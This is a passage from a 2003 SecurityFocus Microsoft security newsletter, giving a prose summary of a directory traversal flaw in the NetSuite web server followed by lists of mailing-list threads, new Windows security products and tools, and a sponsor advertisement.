Date Published: Jul 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8197
Summary:
NetSuite is a simple SMTP and HTTP/CGI server for Microsoft Windows based
systems.
The HTTP component of NetSuite has been reported prone to a directory
traversal vulnerability.
Various combinations of encoded directory traversal sequences may be used
to break out of the web root directory. Attackers may gain access to files
that are readable by the web server as a result.
Successful exploitation may expose sensitive information to remote
attackers. This information could be used to aid in further attacks that
attempt to compromise the host.
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Internet explorer history viewer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329280
2. CA-SSL in IIS (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329281
3. AW: Internet explorer history viewer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329276
4. CIFS Security (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329101
5. SecurityFocus Microsoft Newsletter #145 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/328997
6. FW: Keyboard Locking/Invisible Screensaver (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/328911
7. investigating misuse of the internet (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/328725
8. How to generate list of patches installed? (long) (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/328724
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. Primedius Personal Firewall/Anti-Spy ware
by Primedius
Platforms: Windows 2000, Windows XP
Relevant URL:
http://www.primedius.com/PersonalFirewall.htm
Summary:
Primedius Personal Firewall/Anti-Spy ware Prevents intrusions, stops
unwanted entries to and communications from your computer. Other features
are: - Detects, reviews and screens any entry through Winsock layer.
2. F-Secure Internet Security 2003
by F-Secure Corporation
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.f-secure.com/estore/fsis2003.shtml
Summary:
F-Secure Internet Security 2003 includes an award winning antivirus
software, as well as an easy-to-use personal firewall product that
protects your system against break-in attempts when you are connected to
the Internet.
3. Steganos Security Suite 5
by Steganos
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.steganos.com/en/sss/index.htm
Summary:
A complete, easy-to-use security package that encrypts and conceals your
data. The Steganos Safe is a secure hard drive, which disappears at the
click of a button. Thanks to on-the-fly-encryption, 1 GB of data can be
encrypted in less than a second. Create encrypted e-mail attachments.
Includes Internet Trace Destructor, file shredder, e-mail encryption,
password manager and computer locking.
V. NEW TOOLS FOR MICROSOFT PLATFORMS
-------------------------------------
1. aNTG v1.0
by Lucas
Relevant URL:
http://www.thebobo.com/antg.php
Platforms: UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
aNTG (another Network Traffic Grapher) is a PHP program that collects and
graphs network traffic statistics on a Linux machine.
2. LibTomMath v0.23
by Tom St Denis tomstdenis (at) iahu (dot) ca [email concealed]
Relevant URL:
http://math.libtomcrypt.org/
Platforms: Linux, UNIX, Windows 2000, Windows 95/98, Windows NT, Windows
XP
Summary:
LibTomMath provides highly optimized and portable routines for a vast
majority of integer-based number theoretic applications (including public
key cryptography).
3. Darik's Boot and Nuke v1.0.1
by Darik Horn
Relevant URL:
http://dban.sourceforge.net/
Platforms: Os Independent
Summary:
Darik's Boot and Nuke (DBAN) is a self-contained boot floppy that securely
wipes the hard disks of most computers. DBAN will automatically and
completely delete the contents of any hard disk that it can detect, which
makes it an appropriate utility for bulk or emergency data destruction.
VI. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored by: KaVaDo
Your network Firewall and IDS products do not prevent Web application
exploits - the most common form of online attack - resulting in Web
defacement, data theft, sabotage and fraud.
KaVaDo is the first and only company that provides a complete and
integrated suite of Web application security products, allowing you to:
- assess your entire Web environment with a Web Application Scanner, ·
- automatically set positive security policies for real-time protection,
and
- maintain such policies at the Application Firewall without compromising
business performance.
For more information on KaVaDo and to download a FREE white paper on
Security Policy Automation for Web Applications, please visit
http://www.securityfocus.com/Kavado-ms-secnews3
------------------------------------------------------------------------
-------
------------------------------------------------------------------------
---
------------------------------------------------------------------------
---
[ reply ]